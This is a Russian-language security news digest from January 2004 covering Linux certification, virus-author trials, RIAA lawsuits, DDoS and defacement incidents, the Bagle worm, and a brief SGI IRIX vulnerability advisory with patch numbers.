Рассылка закрыта
При закрытии подписчики были переданы в рассылку "Информационная безопасность: новости, статьи, обзоры" на которую и рекомендуем вам подписаться.
Вы можете найти рассылки сходной тематики в Каталоге рассылок.
15 новостей по информационной безопасности каждый день
Информационный Канал Subscribe.Ru |
Содержание
- События, семинары, конференции, даты
- Исследования, открытия, лабораторные разработки
- Регулирование: Законы, постановления, сертификация, контроль
- Проблемные ситуации, информационная преступность, сетевые войны
- Технологии безопасности. Организации разработчики, интеграторы.
- Информационая безопасность государственной власти
- Информационая безопасность общественной коммуникации, личности.
- Дыры и патчи программ и операционных сред
События, семинары, конференции, даты |
SuSE объявит о сертификации Linux по Common Criteria
22 января | securitylab.ruВ августе 2003 года SuSE Linux Enterprise Server (SLES) была сертифицирована на соответствие Evaluation Assurance Level 2 (EAL2) — второму уровню всемирно признанного набора государственных требований по безопасности, называемых Common Criteria. Как ожидается, в среду генеральный директор Novell Джек Мессман объявит о том, что операционная система прошла испытания более высокого уровня EAL3.
Сертификация относится к операционной системе SLES, которая работает на всех семействах серверов IBM: мейнфреймах zSeries, Intel-серверах xSeries, серверах среднего уровня iSeries, Unix-серверах pSeries и серверах eServer 325 с процессорами AMD Opteron.
Сертификация на соответствие Common Criteria — необходимое условие, выдвигаемое многими государственными и военными заказчиками, — делает Linux еще на один шаг ближе к достижению статуса конкурирующих операционных систем, таких как Microsoft Windows, Sun Microsystems Solaris, Hewlett-Packard HP-UX и IBM AIX, каждая из которых сертифицирована по более высокому уровню EAL4.
Red Hat, компания, которая продает наиболее широко используемую версию Linux, в феврале прошлого года объявила о совместной работе с Oracle по сертификации EAL2 к концу 2003 года, однако пока не слышно, чтобы она прошла этот уровень. В декабре представитель Oracle сказал, что сертификация ОС Red Hat запланирована на середину января.
Red Hat и SuSE являются бизнес-партнерами IBM, но в Нью-Йорке Big Blue демонстрирует теплые отношения именно с SuSE. Во вторник, накануне открытия конференции, Джим Столлингс, генеральный менеджер IBM по Linux, на мероприятии для бизнес-партнеров SuSE похвалил компанию. «Мы наблюдали феноменальную прочность их технологического лидерства. Это первая компания, которая довела степень масштабирования до восьми процессоров, — сказал он, имея в виду, что SuSE опередила конкурентов с версией Linux, способной эффективно работать на мощных восьмипроцессорных серверах. — SuSE осваивает рынок быстрее любого из своих конкурентов».
По доле рынка SuSE уступает Red Hat, однако ее ОС стала поддерживать все семейства серверов IBM гораздо раньше, чем Red Hat, которая добилась этого только в октябре. Теперь, после того как Novell завершила операцию по приобретению SuSE за 210 млн долл., IBM намерена инвестировать в эту компанию 50 млн долл.
В Нью-Йорке открылась выставка-конференция Linuxworld 2004
22 января | cyberinfo.ru20 января в Нью-Йорке открылась выставка-конференция
Linuxworld 2004. Конференц-часть Linuxworld будет проходить с 20 по 23 января, а
выставочная - с 21 по 23 января. Сейчас уже никого не удивляет то, что
Linuxworld - это мероприятие, ориентированное на корпоративный сектор рынка
информационных технологий. Времена, когда на Linuxworld собирались независимые
разработчики свободного софта и толпы линуксоидов, безвозвратно ушли. Теперь
Linux - это большой бизнес, и именно бизнес диктует правила игры.
С
речами на Linuxworld 2004 выступят представители крупнейших компаний,
поставляющих дистрибутивы Linux и информационные системы на базе этой платформы.
Первым на нынешней Linuxworld выступит глава Novell Джек Мессман. После
приобретения SuSe Linux и Ximian эта компания вошла в число главных игроков на
рынке открытого программного обеспечения для бизнеса. Поэтому неудивительно, что
именно Джек Мессман произнесет на выставке вступительную речь.
Помимо
Мессмана на Linuxworld 2004 выступят вице-президент Oracle Дэйв Дарго,
вице-президент Amazon.com Том Киллалиа, старший вице-президент и главный
разработчик Computer Associates Сэм Гринблатт и генеральный менеджер IBM по
направлению e-Business on demand Росс Маури.
Среди наиболее ожидаемых
новых продуктов, которые будут представлены на выставке, стоит выделить
дистрибутивы Linux на базе нового ядра версии 2.6. Это ядро отличается
улучшенной поддержкой многопроцессорных систем, что особенно важно для
использования Linux на мощных серверах. Кроме того, активное участие в
Linuxworld примет компания Oracle, в прошлом году представившая новое поколение
программных продуктов Oracle 10g. Корпорация IBM, в свою очередь, будет
демонстрировать сложные информационные системы на базе своих серверов и ОС
Linux. По сложившейся традиции примет участие в выставке и Microsoft. Софтверный
гигант представит средства для обеспечения совместимости между системами на базе
Windows и Linux.
Исследования, открытия, лабораторные разработки |
Абоненты хотят прятаться
21 января | asteraНЬЮ-ЙОРК - Современные технологии сотовой связи
позволяют оператору определить местонахождение обладателя телефона, и такая
возможность слежки всерьез тревожит абонентов. В ответ на эти опасения компания
Bell Labs, подразделение Lucent Technologies, разработала технологию, с помощью
которой, как утверждается, абонент сможет сам определять степень открытости
информации о его местонахождении.
На этой неделе представители Bell планируют
представить новую технологию и осветить ее аспекты, связанные с пропускной
способностью, пользовательской конфиденциальностью и возможностями настройки в
условиях реально функционирующих телефонных сетей. Настройка в данном случае
означает задание полной информации о том, какая информация о местонахождении
абонента доступна посторонним, а также когда она доступна, при каких условиях и
кому именно. Предполагается, что с помощью этой технологии операторы
беспроводных сетей будут создавать новые виды услуг, "зависимых от
местонахождения" и обеспечивающих абонентам дополнительные удобства.
Один
из американских операторов, AT&T Wireless Services, уже включил в свой пакет
услугу "Найди друзей", в чем-то похожую на адресную книгу в службах мгновенного
обмена сообщениями, однако в целом сервис, связанный с определением текущего
местонахождения, пока не получил развития.
Не так давно определенный
прогресс в этой области был достигнут благодаря федеральному закону, согласно
которому сотовые операторы должны иметь возможность определять нахождение
абонентов, звонящих в службу спасения "911". Операторам пришлось провести
дорогостоящую модернизацию своих сетей, и теперь они заинтересованы в том, чтобы
использовать новую функцию для получения дохода. К примеру, рестораны и другие
предприятия такого рода могут посылать на телефоны оказывающихся поблизости
абонентов SMS-сообщения с приглашением, сотрудники организаций могли бы быстрее
связываться друг с другом или с клиентами и т. д. Многие абоненты были бы не
против получать такие оповещения, хотя в большинстве случаев они, вероятно,
предпочтут не светиться, делая информацию о себе доступной
окружающим.
Кроме того, обеспечение настоящей гибкости подобных служб в
режиме реального времени сопряжено с немалыми техническими трудностями: если
предоставить клиенту возможность оперативно указывать, кто, когда и при каких
условиях может его обнаружить, то число опций при этом окажется небольшим. Одним
из решений здесь может стать создание в сети баз данных по сервисам, в которых
каждая опция была бы снабжена переключателем "включен -
выключен".
Инженеры из Bell утверждают, что их программная система
основана на наборах правил, делающих персонализацию настроек более гибкой и при
этом позволяющих не перегружать телефонную сеть. Большинству абонентов столь
гибкая система, вероятно, не понадобится, но для операторов она может оказаться
полезной.
"Всегда может найтись продвинутый пользователь, желающий
задействовать все имеющиеся функции и полностью настроить свой телефон на
различные условия, - говорит Рик Халл, директор подразделения исследований в
области сетевых технологий и услуг Bell. - Например, бизнесмен может обеспечить
своей жене возможность с предельной точностью отслеживать его перемещение, а
другим предоставлять сведения с точностью лишь до 20 км".
Bell объявила,
что ведет с рядом сотовых операторов переговоры о пробной эксплуатации новой
технологии. Ожидается, что коммерческие продукты на ее основе появятся в будущем
году. (DJ, 19. 01. 2004, Александр Сафин)
Регулирование: Законы, постановления, сертификация, контроль |
Сертифицирован удостоверяющий центр “КриптоПро”
22 января | pcweekКомпания “КРИПТО-ПРО” получила сертификат соответствия на программно-аппаратный комплекс “удостоверяющий центр «КриптоПро УЦ»”.
Сертификат, выданный Центром безопасности связи ФСБ России, удостоверяет, что “КриптоПро УЦ” соответствует требованиям к информационной безопасности удостоверяющих центров класса КС2 и может использоваться в составе технических средств удостоверяющих центров корпоративных ИС, предназначенных для обработки информации, не содержащих сведений, составляющих государственную тайну, с применением средств электронной цифровой подписи.
По словам представителей компании, “КриптоПро УЦ” первым в России сертифицирован в соответствии с системой сертификации РОСС RU.0001.030001.
Microsoft решила простить юного бизнесмена
22 января | ibusiness.ruПредставители Microsoft заявили, что намерены сделать все возможное, чтобы решить конфликт с семнадцатилетним канадцем Майком Роу, не доводя дела до суда.
Суть проблемы, напомним, сводится к тому, что подросток в августе 2003 года зарегистрировал доменное имя MikeRoweSoft.com. Через три месяца адвокаты софтверного гиганта потребовали от молодого человека передать корпорации все права на домен, поскольку его название созвучно с названием корпорации Microsoft, а поэтому нарушает права на торговую марку и вводит посетителей сайта в заблуждение. В качестве компенсации Майку Роу была предложена смехотворная сумма в размере 10 долларов США. Естественно, подросток отказался, и софтверный гигант направил дело в суд. Однако, на сторону ответчика незамедлительно встали пресса и интернет-сообщество, предложившие моральную и материальную поддержку. Роу даже организовал фонд для собственной защиты, а страничка MikeRoweSoft.com оказалась на какое-то время недоступна по причине резкого всплеска посещаемости.
Видимо, именно столь бурная реакция общественности вынудила Microsoft выступить с новым заявлением. Как отметили представители корпорации, они действительно восприняли ситуацию слишком серьезно и в настоящее время готовы предложить все возможные способы решения конфликта мирным путем. Впрочем, рассчитывать на то, что софтверный гигант простит несговорчивого молодого человека и пустит все на самотек, не стоит. Скорее всего, как только утихнет шумиха в прессе, адвокаты компании возьмутся за Майка Роу с новой силой. Юный бизнесмен от каких-либо комментариев пока отказывается.
Автора румынской версии MSBlast начнут судить в пятницу
22 января | http://www.crime-research.ru/В пятницу в Румынии начнется судебное разбирательство по делу 26-летнего Дана
Думитру Чиобану, который обвиняется в создании и распространении вируса
MSBlast-F, одной из версий вируса MSBlast, сообщает The Register. Согласно
недавно переработанному румынскому закону о борьбе с вирусными эпидемиями,
онлайновым мошенничеством и компьютерными взломами, в случае признания Чиобану
виновным ему грозит от 3 до 15 лет тюремного заключения.
Вирус,
запущенный Чиобану, появился в локальной сети Ясского технического университета.
"Написание" вируса свелось к незначительным модификациям оригинальной версии
MSBlast: переименованию исполняемого файла в enbiei.exe (Enbiei - никнейм
Чиобану), замене адреса сайта, которому предстояло подвергнуться DDoS-атаке, с
windowsupdate.com на URL Гидротехнического университета, а также добавлению в
код вируса текста с критикой одного из университетских преподавателей. В отличие
от других версий MSBlast румынской не удалось нанести ощутимого вреда: по данным
The Register, вирус заразил всего 27 компьютеров. Тем не менее, согласно недавно
дополненному румынскому законодательству о борьбе с вирусными эпидемиями,
онлайновым мошенничеством и компьютерными взломами, виновному в написании вируса
грозит тюремное заключение сроком до 15 лет.
Чиобану был арестован в
сентябре 2003 года. Ранее в США был арестован автор другой модификации MSBlast
Джерри Ли Парсон. Американские правоохранительные органы так и не обнаружили
автора оригинального вируса, который появился в середине августа 2003 год и
причинил значительный ущерб, заразив несколько сот тысяч компьютеров. В ноябре
Microsoft предложила 250 тысяч долларов тому, кто предоставит полезную
информацию об авторах вирусов MSBlast и Sobig, однако потенциальное
вознаграждение поискам не помогло.
RIAA выдвинула 532 иска против пользователей файлообменных сетей
22 января | asteraАмериканская ассоциация звукозаписывающих компаний
(RIAA) в среду подала судебные иски против 532 человек, обвинив их в незаконном
копировании и распространении музыкальных файлов в интернете, сообщает AP.
Каждый из этих людей незаконно распространил в интернете более 800
музыкальных композиций, утверждают представители RIAA. Ответчики
идентифицируются только по их IP-адресам, настоящие их имена будут выяснены в
процессе судебного разбирательства, сообщили представители Американской
ассоциации звукозаписывающих компаний.
В случае если суд признает их
вину, ответчикам грозит крупный штраф. У них также остается возможность уладить
конфликт во внесудебном порядке, выплатив RIAA денежную компенсацию за
нанесенный материальный ущерб.
Дата начала судебного слушания пока не
назначена. RIAA также не объявила, какую сумму она намерена взыскать с
ответчиков. В рамках предыдущих исков Американская ассоциация звукозаписывающих
компаний требовала с ответчиков 150 тысяч долларов. Компенсация, выплачиваемая
пользователями во внесудебном порядке, составляла около 3 тысяч долларов.
Напомним, что Американская ассоциация звукозаписывающих компаний в июне
прошлого года начала отслеживать работу файлообменных сетей, в частности, таких,
как Kazaa и Morpheus, чтобы подготовить иски к распространителям нелегальных
записей. В 2003 году RIAA в общей сложности подала более 1600 исков к
пользователям, которые нелегально распространяли музыкальные записи, защищенные
авторскими и лицензионными правами.
RIAA представляет интересы
крупнейших звукозаписывающих компаний США, которые утверждают, что нелегальное
распространение аудиозаписей через интернет приводит к падению доходов от
продажи альбомов и синглов.
Microsoft урегулировала еще один патентный иск
21 января | ibusinessКорпорация Microsoft во вторник урегулировала еще один патентный иск, поданный против софтверного гиганта малоизвестной нью-йоркской компанией E-Data в октябре прошлого года. Напомним, что E-Data обвинила Microsoft, а также провайдера Tiscali и музыкальную фирму On Demand Distribution (OD2) в нарушении европейского патента за номером EP 0 195 098 B-1, выданного еще в 1985 году.
Патент описывает технологию передачи информации в удаленную точку с последующей записью на какой-либо носитель. Подобная схема используется сервисом Tiscali Music Club, через который клиенты (естественно, за определенную плату) могут загружать музыкальные записи на портативные CD- и МР3-плееры. Причем обязательным условием, необходимым для работы со службой Tiscali Music Club, является наличие программного проигрывателя Microsoft Windows Media Player. Свой иск против Microsoft, Tiscali и OD2 компания E-Data подала на территории Германии, поскольку в Соединенных Штатах патент уже потерял силу. И вот вчера стало известно, что ответчикам удалось договориться с руководством E-Data. Правда, какие-либо подробности достигнутого соглашения не раскрываются.
Нужно заметить, что на территории Европы, помимо Tiscali Music Club, функционируют и другие онлайновые музыкальные магазины, и многие из них уже начали получать предупреждения от E-Data по поводу нарушения патента. Кроме того, в ближайшее время должна быть запущена европейская версия сервиса Apple iTunes Music Store. По всей видимости, владельцам таких служб придется выплачивать E-Data лицензионные отчисления.
В поисках исходного кода игры Half-Life 2
21 января | http://www.crime-research.ru/На минувшей неделе ФБР и Секретная служба США провели несколько рейдов в домах
подозреваемых к делу о краже исходного кода игры Half-Life 2, которая
разрабатывается компанией Valve. Напомним, что осенью прошлого года Valve
рассказала о похищении неизвестными хакерами кода одной из самых ожидаемых игр.
Вскоре компания объявила, что из-за утечки кода вынуждена отложить выход игры до
весны 2004 года.
Весть о краже кода вызвала неоднозначную реакцию.
Некоторые комментаторы даже предположили, что утечка кода была сфабрикована
Valve с целью получить формальный повод для задержки выпуска игры. Тем не менее,
американские спецслужбы ведут активный поиск похитителей кода. И, похоже,
следствие напало на какой-то след.
На прошедшей неделе агенты ФБР и
Секретной службы США провели серию обысков в домах участников группы Hungry
Programmers. Один из них, Крис Тошок, рассказал о происшедшем в своем блоге. По
словам Тошока, 14 января в полседьмого утра к нему домой нанесли визит агенты
ФБР и Секретной службы, предъявившие ордер на обыск и изъятие компьютерного
оборудования.
Самому Тошоку и его соседу никаких обвинений предъявлено
не было. Федеральные агенты лишь конфисковали девять компьютеров и массу другого
цифрового оборудования. Судя по предъявленным документам, конфискация техники
была проведена в рамках расследования дела о похищении кода Half-Life 2.
SCO подает иск против компании Novell
21 января | bizon.ruКомпания SCO обратилась в суд Солт-Лейк-Сити (штат Юта) с иском против компании Novell. В иске Novell обвиняется обмане потребителей путем многочисленных публичных заявлений, в которых утверждалось, что именно Novell принадлежат копирайты на ОС Unix System V. SCO считает эти копирайты своими и обвиняет в их нарушении корпорацию IBM и разработчиков ОС Linux. Novell, в свою очередь, с этим не согласна. Кроме этого, в иске SCO говорится, что Novell незаконно подала несколько заявок, связанных с Unix, в американское патентное ведомство. Все эти действия, по мнению юристов SCO, ставят своей целью навредить компании и помешать ей отстаивать права на свою интеллектуальную собственность, то есть Unix. В связи с этим SCO просит суд вынести сначала предварительное, а затем и окончательное решение, пресекающее незаконные действия Novell. В частности, SCO требует от суда предписать Novell отозвать все касающиеся Unix заявки в патентное ведомство, передать SCO все незаконно полученные копирайты и опровергнуть все публичные заявления, затрагивающие интересы компании. Кроме того, SCO требует от Novell компенсации ущерба своим деловой репутации и бизнесу. Как заявляют юристы SCO все претензии Novell безосновательны, так как договор о передаче интеллектуальной собственности на Unix от 1995 года и дополнения к нему предусматривают полную передачу интеллектуальной собственности на Unix от Novell к Santa Cruz Operations. Впоследствии весь связанный с Unix бизнес Santa Cruz Operations выкупила компания Caldera, вскоре сменившая имя на SCO Group. Оставшаяся от Santa Cruz Operations часть была переименована в Tarantella.
Проблемные ситуации, информационная преступность, сетевые войны |
Русские жулики вторично обидели Westpac-банк
22 января | news.proext.comИнтернет-аферист используя программный клиент банка Westpac умыкнул со счетов его клиентов 3000 долларов. На протяжении двух недель следствие блуждало где-то в Новой Зеландии, пока не обнаружилось, что украденные деньги были посланы с помощью электроники из России через другой местный счет банка.
Westpac отказался идентифицировать жертву, которой уже возместили украденные деньги. Воровства, подобные этому инциденту, в Австралии были произведены путем массовых рассылок по электронной почте в ноябре прошлого года. Клиентам банков приходили послания, всеми силами старавшихся убедить клиента ввести свои ID данные на подложном сайте. Это преступление тоже было прослежено до России.
Жулики проникают в компьютеры клиентов банков непосредственно напрямую, минуя слабые или плохо настроенные файрволы. На компьютере жертвы запускается "троянская программа", регистрирующий программное обеспечение, которое прячется в персональном компьютере клиента, собирая пароли и номера счетов и отправляя их мошеннику.
Положение усугубляется тем, что крупные банки, опасаясь потери престижа, не сообщают о таких кражах, предпочитая улаживать все своими силами.
Торговцы Child Porn пытаются парализовать работу www.charter97.org
22 января | http://www.crime-research.ruИнформационное пространство интернета было "взорвано" в минувшую пятницу
появлением материалов, которые рассказывали о белорусских гражданах и компаниях,
которые зарабатывают деньги на торговле во Всемирной паутине детской
порнографией. Разоблачительные материалы на эту тему были опубликованы на сайтах
крупнейших иностранных изданий, информационных агентств и интернет-ресурсов. В
понедельник на сайте www.charter97.org было размещено журналистское
расследование "Белорусские корни торговцев Child Porn", в котором раскрывались
подробности "грязного" бизнеса. На следующий день сайт был атакован неизвестными
хакерами. К 13 часам дня вторника им удалось полностью парализовать работу сайта
www.charter97.org
Атака началась примерно в 8.30 - 9.00 по минскому
времени. К сайту было обращено огромное количество запросов, которые сервер, на
котором расположен сайт, не был в состоянии обработать. Подобные так называемые
DOS-атаки являются, на сегодняшний день, одним из самых распространенных
средств, парализующих работу веб-сайтов. По признанию службы поддержки
компании-хостера "Мастерхост", обслуживающей www.charter97.org, более половины
запросов к сайтам, размещенных на сервере "Мастерхоста", были обращены к
www.charter97.org. Работа сайта была полностью парализована к 13.00 минского
времени.
В данный момент на сайте ведутся восстановительные работы.
Статья, вызвавшая хакерскую атаку, размещена по адресу http://195.133.248.5/
Атака хакеров на сайт www.charter97.org и парализация, как ее результат,
работы сайта, свидетельствует о серьезности темы, поднятой в статье. Однако
усилия по ограничению распространения информации о преступной деятельности
торговцев Child Porn не имеют смысла. Подобными действиями возможно лишь еще
более заинтересовать общественность, привлечь более пристальное внимание к этой
актуальной проблеме.
Хакеры взломали 150 общественных веб-сайтов за 3 дня
22 января | http://www.crime-research.ru/В Малайзии за три дня было взломано более ста пятидесяти веб-ресурсов, 120 из
которых принадлежали государственному сектору.
Национальная группа
оперативного реагирования на чрезвычайные ситуации в области компьютеров
(MyCERT) получила информацию, что хакеры «порезвились» подобным образом в Китае,
Гонконге и Тайване. Пострадали ресурсы таких доменных зон, как .gov, .net, .com,
.edu и .org.
Большинство из них работали на серверах под управлением
операционной системы Linux, которая считается более безопасной, нежели Windows.
В основном взломщики использовали существующие уязвимости данных ОС.
Менеджер MyCERT Солахуддин Шамсуддин считает, что инцидента можно было
избежать, если бы системные администраторы внимательно следили за информацией о
появляющихся проблемах в известных операционных системах. Кроме того, г-н
Шамсуддин сказал, что массовый дефейс – это дело рук двух бразильских хакерских
группировок ( [invalid operator XRed Eye^Y и ^XIr4dex^Y), которые, видимо,
устроили соревнование.
ФБР расследует взлом системы голосований
21 января | news.proext.comМестные и федеральные власти в США, включая ФБР, расследуют вторжение в компьютерную сеть компании, поставляющей программное обеспечение для систем голосования. Основная версия - политические мотивы хакера.
Компания VoteHere во вторник подтвердила сообщение, что в ее сеть в октябре было осуществлено несанкционированное проникновение. Компания идентифицировала подозреваемого и передала дело ФБР, которое и проводит расследование.
История взлома сети VoteHere, сообщенная в понедельник MSNBC и Ассошиэйтед Пресс, вероятно, вызовет оживленные дебаты по безопасности и надежности электронных систем голосования. Однако, шеф пострадавшей компании заверил всех заинтересованных лиц, что вторжение не нарушило работу систем и было быстро обнаружено и пресечено.
Программное обеспечение компании тем временем - наиболее популярно в сфере обеспечения голосований.
Вирусы обращаются к пиринговым сетям
21 января | webplanetАвторы вирусов используют пиринговые сети для
распространения своих творений. Подобная методика усложняет прекращение процесса
распространения вредоносных кодов. По мнению экспертов, p2p сети становятся все
более привлекательными для создателей вирусов.
Способов построения пиринговых сетей — множество, архитектура
с центральным сервером, управляющим другими машинами в сети,
встречается редко. Вместо этого каждый компьютер разделяет бремя организации
системы, и должен предоставлять хранимую информацию прочим звеньям цепи.
Наиболее известные пиринговые сети, такие как Kazaa, используются широкой
аудиторией для поиска музыки, видео и других файлов.
Одним из первых вирусов, использовавших пиринговую сеть для размножения, был
червяк Slapper, ориентированный на ОС Linux. Под Windows вирус, называемый
Sinit, появился в 2003 году. Он превращал каждую зараженную машину
в звено p2p сети. Ожидалось, что создатель Sinit будет использовать
получившуюся сеть для управления зараженными компьютерами. «Это вечная гонка
вооружений между авторами вирусов и антивирусными фирмами. Sinit —
новый дерзкий вызов антивирусным компаниям», — сказал в интервью BBC Пит Симпсон (Pete Simpson) из компании Clearswift, предоставляющей услуги
фильтрации почты.
Раньше некоторые авторы
Кевин Хоган (Kevin Hogan), глава центра антивирусной защиты Symantec Security
Response, грустно шутит: «Хорошей новостью о вирусных пиринговых сетях
является то, что они редки. Это немножко сложнее, чем внедрить „троянского коня“
на единственном сервере». Ситуацию спасает не всегда эффективная передача команд
между машинами распределенной сети и то, что редко используемые порты,
через которые идет обмен информацией, блокируются большинством систем сетевой
защиты. Однако, Хоган считает, что тенденция использования p2p сетей будет
расти.
Технологии безопасности. Организации разработчики, интеграторы. |
АБОНЕНТЫ ХОТЯТ ПРЯТАТЬСЯ
22 января | park.ruНЬЮ-ЙОРК - Современные технологии сотовой связи позволяют оператору определить местонахождение обладателя телефона, и такая возможность слежки всерьез тревожит абонентов. В ответ на эти опасения компания Bell Labs, подразделение Lucent Technologies, разработала технологию, с помощью которой, как утверждается, абонент сможет сам определять степень открытости информации о его местонахождении...\ Инженеры из Bell утверждают, что их программная система основана на наборах правил, делающих персонализацию настроек более гибкой и при этом позволяющих не перегружать телефонную сеть. Большинству абонентов столь гибкая система, вероятно, не понадобится, но для операторов она может оказаться полезной.
Детектор червей от Check Point ведет учет уязвимостям
21 января | securitylab.ruПроизводитель брандмауэров Check Point выпустил устройство для защиты корпоративных сетей от кибератак, использующих известные уязвимости в LAN-протоколах и приложениях. Устройство InterSpect сообщается с регулярно обновляемой базой данных известных уязвимостей, и когда пакеты, связанные с определенным приложением, начинают вести себя подозрительно, перехватывает управление, ставит соответствующий ПК на карантин и предупреждает пользователя о том, что доступ к общей сети временно прекращается — до тех пор, пока компьютер не будет очищен.
Управляющий директор Check Point UK Ник Лав пояснил ZDNet UK, что компании, как правило, защищают свои сети по периметру, и если злоумышленный код занесен вовнутрь (например, через зараженный ноутбук), то возникают проблемы. InterSpect позволяет сегментировать сеть, так что в случае тревоги зоны риска — такие как «зона соприкосновения», где работает много пользователей с ноутбуками, — могут быть быстро изолированы от остальной сети.
«Если в зоне соприкосновения окажется лаптоп, зараженный червем, InterSpect физически отключит это устройство от общей корпоративной сети. Оно будет подключено к другой части сети, которая обеспечивает доступ к необходимым службам для восстановления и очистки ПК», — пояснил Лав.
По его словам, потребность в такой защите вызвана тем, что перед установкой патчей компании обычно выполняют серию тестов, и у злоумышленников есть возможность воспользоваться уязвимостями. Лав приводит в пример MSBlast, использующий уязвимость, о которой было объявлено в апреле 2003 года, а патч для нее опубликовали в июле. Червь MSBlast появился в августе того же года — и, хотя об уязвимости было известно уже несколько месяцев, всю вину возложили на системы, основанные на контрольных сигнатурах. «Ни одна такая система не могла и не сможет обнаружить червя, если он смутировал, — в этом случае их надо опять обновлять», — говорит Лав.
Он уверяет, что, если бы в то время существовала система InterSpect, она обнаружила бы попытку воспользоваться уязвимостью Microsoft, о которой уже было известно. «Мы не разыскиваем известные злонамеренные пакеты — мы выявляем поведение приложений, обращенное к этим уязвимостям. Мы можем заключить, что приложение ведет себя неестественно; следовательно, структура пакетов и их поток злонамеренны, и мы блокируем их».
Аналитическая фирма IDC утверждает, что рынок аппаратуры защиты сетей демонстрирует уверенный рост, но Check Point, вероятно, столкнется с конкуренцией со стороны доминирующих на этом рынке Cisco и NetScreen, доли рынка которых составляют соответственно 27,7% и 20,8%.
InterSpect от Check Point поддерживает протоколы CIFS, MS SQL, DCOM, Sun RPC, DCE RPC, HTTP и др. Продукт поступит в продажу немедленно по цене от 9000 до 39000 долл.
Информационая безопасность государственной власти |
Полиция ищет террористов в интернет-кафе
21 января | http://www.crime-research.ru/Полиция города Бомбей, демонстрируя неустанную заботу о безопасности народа,
будет искать террористов в интернет-кафе.
По информации агентства AP, в
соответствии с новыми правилами пользования интернет-кафе, расположенными на
территории Бомбея, всем посетителям, желающим набрать в адресной строке браузера
заветные буквы «http...», придется предъявлять владельцам заведения документ,
удостоверяющий личность, и указывать свой домашний адрес. В свою очередь,
владельцы интернет-кафе обязаны сохранять собранные сведения в течение одного
года с момента получения и делиться этой информацией с полицией по первому же
требованию. В случае если выяснится, что компьютер, расположенный в кофейне,
использовался хакером, кибер-вымогателем или террористом, владельцев ждет
суровое наказание.
Полицейское начальство объясняет столь резкое
закручивание гаек необходимостью усиления борьбы с террористами, которые, как
известно, днюют и ночуют в пунктах коллективного пользования интернетом.
Административный акт будет предложен на рассмотрение правительства штата
Махараштра в феврале и, по всей видимости, пройдет процедуру утверждения без
каких-либо затруднений. Всего под раздачу попадет около трех тысяч бомбейских
интернет-кафе, которыми пользуются около полутора миллионов человек. Тем не
менее, противники нововведения опасаются, что эта «новаторская инициатива» может
быть с энтузиастом подхвачена властями других штатов и тогда сеть
административного внимания накроет еще как минимум 200 тысяч подобных заведений
по всей стране.
Информационая безопасность общественной коммуникации, личности. |
Эпидемия червя Bagle идет на спад
22 января | compulenta.ruАнтивирусная компания Panda Software сообщает, что количество инцидентов, вызванных червем Bagle.A, постепенно идет на убыль. В частности, число связанных с Bagle обращений в службу технической поддержки Panda в последние дни сократилось. Аналогичный эффект наблюдают и другие антивирусные фирмы.
Bagle.A мощно стартовал, распространившись по миру за считанные часы. Антивирусными фильтрами были заблокированы сотни тысяч писем с этим червем. Например, Panda Software зафиксирован случай, когда в сеть одной из западных компаний менее чем за сутки пытались попасть почти 100 тысяч электронных писем с Bagle.A.
Тем не менее, поскольку пользователи были своевременно информированы о характеристиках Bagle.A и оперативно обновили свои антивирусные программы, количество циркулирующих зараженных посланий существенно уменьшилось. Как следствие, активность вируса перестала носить эпидемический характер.
Напомним, что зараженные Bagle письма содержат файл с расширением .exe и случайным именем, размер файла - 15872 байт. В теле письма содержатся слово test и беспорядочный набор символов. Исполняемый файл может маскироваться под Windows-приложение "Калькулятор", но его основная задача - пробить брешь в системе безопасности ОС, которой потом могут воспользоваться злоумышленники.
Интернет — самое увлекательное СМИ
21 января | webplanetНи одно средство массовой информации не может
сравниться с интернетом по количеству постоянных, преданных читателей, то
есть тех, которые тратят на чтение больше часа в день.
В 2001 году 23% взрослых американцев проводили в интернете
7 и более часов. В 2002 году этот процент увеличился до 24,6%,
а в 2003 — до 26,2%, что составляет в абсолютных цифрах
131 млн 417 тыс человек. Рост постоянной аудитории интернета
приобретает особое значение, если сравнить его с постоянными аудиториями
других медиа, которые совсем не растут или даже снижаются.
Таким образом, глобальное мировое медиапространство постепенно перемещается
в интернет, хотя общее количество читателей газет и зрителей ТВ не
уменьшается, однако традиционные СМИ сами все более активно используют Сеть для
расширения своей аудитории. В том числе по этой причине доля постоянных
читателей (американские социологи используют термин «heavy users», что можно
перевести как «увлеченные читатели») растет именно в Сети, а не
у газет или телевидения. Это очень важно, потому что такие люди составляют
самую ценную и качественную часть аудитории любого СМИ.
Увеличение количества активных пользователей интернета «можно рассматривать
как новую возможность для газет и других традиционных медиа, — говорит
президент фирмы International Demographics, Inc., отслеживающей индустрию
средств массовой информации. — В последние
В исследовании The Media Audit приводится
статистика: так, процент «увлеченных» слушателей радио (180+ минут
в день) снизился с 29,7% до 27,5%, а процент «увлеченных»
читателей почтовых бумажных рассылок и рекламных каталогов (которые читают
75% или больше корреспонденции) снизился с 22,4% до 21%. У газет
и телевидения фанатов тоже не прибавляется. Число людей, которые читают
прессу 60+ минут в день, упало с 19,8% до 19,6%, а количество
тех, кто смотрит телевизор 300+ минут в день, возросло незначительно:
с 20,4% до 20,6%.
Другими словами, интернет сейчас является единственным информационным
источником, который вызывает настоящий интерес аудитории и чья аудитория
постоянно расширяется не только количественно, но и качественно, за счет
«увлеченных» читателей.
Важный момент еще заключается в том, что по демографическим показателям
постоянную аудиторию интернета составляют относительно состоятельные люди
с высшим образованием (качество постоянной аудитории радио
и телевидения значительно хуже). Что самое странное, демографические
показатели увлеченных пользователей интернета не меняются по мере увеличения их
численного количества.
Дыры и патчи программ и операционных сред |
Локальный DoS в SGI IRIX
22 января | securitylab.ruПрограмма: SGI IRIX 6.5.21
Опасность: Низкая
Наличие эксплоита: Да
Описание: Уязвимость обнаружена в операционной системе SGI IRIX. Локальный пользователь может вызвать условия отказа в обслуживании в ядре системы.
Локальный пользователь может вызвать PIOCSWATCH ioctl() функцию, чтобы нарушить работу ядра системы.
URL производителя: www.sgi.com/support/security/
Решение:Установите соответствующее исправление:
IRIX 6.5.17m, 5087 IRIX 6.5.17f, 5088 IRIX 6.5.18m, 5097 IRIX 6.5.18f, 5098 IRIX 6.5.19m, 5101 or 5058 IRIX 6.5.19f, 5102 or 5064 IRIX 6.5.20m, 5079 or 5099 IRIX 6.5.20f, 5080 or 5100
Слабая конфигурация по умолчанию в NetScreen-Security Manager
22 января | securitylab.ru
